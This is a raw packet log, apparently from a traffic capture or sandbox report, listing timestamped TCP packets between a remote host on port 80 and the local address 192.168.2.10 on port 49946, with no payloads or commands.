Dec 12, 2024 16:48:48.343362093 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.343432903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.343476057 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.344486952 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.344578981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.345489979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.345496893 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.345530033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.345634937 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.346401930 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.346522093 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.346597910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.347433090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.347695112 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.348063946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.348567963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.348573923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.348664999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.349438906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.349631071 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.350474119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.350481033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.350511074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.350565910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.351464033 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.351526022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.351619005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.352498055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.352566957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.352869987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.353472948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.353602886 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.353904963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.354528904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.354639053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.355325937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.355516911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.355643034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.355722904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.356499910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.356594086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.496021986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.496068954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.496196032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.496412039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.496670008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.496751070 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.497216940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.497359037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.498039961 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.498265028 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.498317957 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.499264002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.499393940 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.499483109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.499708891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.500296116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.501187086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.501298904 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.501379013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.501513958 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.501744032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.502312899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.502320051 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.502398968 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.503278971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.503361940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.503706932 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.504391909 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.504501104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.505286932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.505414963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.505794048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.506385088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.506392002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.507380962 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.507404089 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.507785082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.508382082 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.508486986 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.509402990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.509409904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.509449959 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.509496927 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.509497881 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.510363102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.510996103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.511432886 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.511440992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.511512995 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.512404919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.512540102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.512638092 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.513438940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.513447046 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.513521910 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.514502048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.514673948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.515463114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.515609026 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.515707016 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.516462088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.517031908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.517112970 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.517472982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.517669916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.518465996 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.518536091 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.519210100 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.519618034 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.519706011 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.519777060 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.520524979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.520602942 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.521599054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.521605968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.521614075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.521688938 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.522619009 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.522831917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.523614883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.523622036 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.523699999 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.524578094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.524892092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.524971008 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.525685072 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.525691986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.525810957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.526629925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.527674913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.527682066 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.527715921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.527793884 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.528646946 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.529704094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.529710054 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.529717922 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.529799938 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.530690908 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.531147003 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.531397104 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.531737089 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.531743050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.531852007 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.532708883 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.533330917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.533587933 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.533756971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.533763885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.533881903 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.534734964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.535479069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.535590887 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.535789967 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.535798073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.535887003 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.536770105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.537234068 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.537350893 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.537811041 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.538147926 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.538311005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.538839102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.538847923 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.539423943 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.540775061 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.540864944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.540870905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.541012049 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.541220903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.541953087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.541960001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.542062044 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.542924881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.543896914 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.543905020 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.543948889 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.543967962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.544020891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.544902086 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.545073986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.546068907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.546148062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.546230078 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.546909094 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.547028065 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.547041893 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.547713041 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.547914982 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.548326015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.548619032 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.548896074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.688667059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.688730955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.688829899 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.688994884 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.689069986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.689131021 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.690025091 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.690104008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.690150976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.691066980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.691168070 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.691236973 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.692044973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.692183971 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.692250013 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.693062067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.693111897 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.693377018 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.694099903 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.694252968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.694653034 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.695152044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.695276022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.695388079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.696152925 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.696227074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.696459055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.697132111 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.697308064 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.697350025 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.698199987 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.698304892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.698318958 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.699141979 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.699270964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.699373007 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.700205088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.700256109 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.700418949 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.701195002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.701247931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.701297998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.702181101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.702311039 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.702326059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.703212976 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.703295946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.703367949 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.704253912 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.704396009 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.704421997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.705310106 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.705316067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.705344915 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.706336021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.706439972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.706500053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.707297087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.707386017 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.707398891 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.708277941 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.708415985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.708482981 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.709373951 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.709496021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.709541082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.710330963 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.710510969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.710587978 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.711360931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.711401939 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.711446047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.712352037 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.712485075 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.712557077 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.713397980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.713452101 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.713499069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.714397907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.714438915 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.714502096 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.715396881 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.715465069 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.715488911 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.716423988 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.716609001 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.716680050 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.717432022 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.717551947 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.717602968 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.718457937 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.718508005 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.718601942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.719482899 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.719598055 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.719599962 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.720468044 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.720557928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.720633984 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.721487045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.721540928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.721573114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.722470045 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.722552061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.722593069 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.723565102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.723673105 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.723885059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.724555969 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.724653006 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.724721909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.725613117 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.725754023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.725791931 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.726620913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.726701021 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.726747990 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.727607965 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.727669954 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.727693081 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.728610039 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.728674889 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.728763103 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.729600906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.729651928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.729727983 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.730606079 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.730664968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.730710983 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.731617928 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.731677055 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.731822968 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.732688904 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.732800007 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.732805014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.733732939 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.733791113 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.733840942 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.734684944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.734797955 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.734833002 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.735709906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.735910892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.735959053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:48.738476992 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.738483906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:48.738491058 CET	80	49946	185.81.68.147	192.168.2.10
